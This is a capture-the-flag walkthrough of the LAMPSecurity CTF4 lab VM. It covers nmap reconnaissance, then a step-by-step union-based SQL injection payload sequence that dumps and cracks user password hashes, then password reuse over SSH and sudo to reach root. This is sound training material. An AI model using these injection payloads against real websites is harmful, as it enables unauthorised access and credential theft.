- VM: LAMPSecurity: CTF4
- Goal: Gain root access
- Approach: solve without automated exploitation tools
nmap -sn 192.168.172.200-254
nmap -p- -A 192.168.172.237
- Port 22: OpenSSH 4.3
- Port 80: Apache httpd 2.2.0
Also found 5 hidden folders /mail/, /restricted/, /conf/, /sql/, /admin/ at port 80. Looks like web server should be checked out first.
First is to poke around the website for a bit.
Let’s check hidden folders. /conf returned error. /restricted, /mail & /admin all require login. But found table schema at hidden folder /sql:
This looks some great info with table user that stores user_name & user_pass.
After checking out some more found the blog page seems to be vulnerable to SQL injection by appending single quote (‘) to the id value:
By knowing the table schema that blog_id is the id field, I then further test the SQL injection with following id value with success (able to retrieve info with custom SQL statement):
id=1000+or+blog_id%3d2-- (100 or blog_id=2--)
It’s time to try to retrieve content of table user. Base on the table schema, the blog table has 4 fields. Let check out which fields are used for display:
id=1000+union+select+1,2,3,4-- (1000 union select 1,2,3,4--)
Oops! Error. Look like the number of field is not 4. Now I need to find out how many columns table blog actually has. By doing a few tests using order by clause.
id=1000+order+by+4-- (1000 order by 4--) id=1000+order+by+5-- (1000 order by 5--) id=1000+order+by+6-- (1000 order by 6--)
order by 4 & order by 5 worked fined. order by 6 returned error. That means the table has 5 fields, not 4. Back to check out which fields are used to display again:
id=1000+union+select+1,2,3,4,5-- (1000 union select 1,2,3,4,5--)
Great. field 2, 3, 4 and 5 are used. Now it’s time to retrieve the user table’s content:
id=1000+union+select+1,user_pass,3,4,user_name+from+user-- (1000 union select 1,user_pass,3,4,user_name from user--)
Nice. obtained 6 sets of username & password hashes. The hashes are 32 hex characters. Very likely to be MD5 hash.The hashes were then decrypted successfully using md5decrypt.net:
dstevens: ilike2surf achen: seventysixers pmoore: Homesite jdurbin: Sue1978 sorzek: pacman ghighland: undone1
With these passwords in hand, I try using them on ssh. We are lucky. The passwords stored in the database are actually same passwords used to login to the system.
Time to enumerate the system to find out any way to get root privilege. Let’s first find out more about the user using id command:
The user ‘dstevens’ is member of group admins. Next I check his ability to use sudo and sure enough he can perform sudo su and here root shell is granted.
sudo -l sudo su
root shell achieved!